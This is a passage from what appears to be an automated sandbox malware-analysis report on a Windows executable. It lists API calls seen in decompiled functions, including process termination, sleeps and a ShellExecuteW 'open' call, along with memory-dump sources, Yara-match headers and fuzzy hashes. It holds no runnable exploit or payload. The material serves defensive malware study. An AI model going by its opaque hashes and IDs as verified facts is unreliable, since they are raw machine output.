                                        				return 0;
                                        			}






                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • exit.MSVCRT ref: 0040DCDB
                                        • Sleep.KERNEL32(00000064), ref: 0040DCED
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                        • String ID:
                                        • API String ID: 772260455-0
                                        • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                        • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                        • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                        • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                        • String ID: open
                                        • API String ID: 317973523-2758837156
                                        • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                        • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                        • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                        • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                        Uniqueness

                                        Uniqueness Score: -1.00%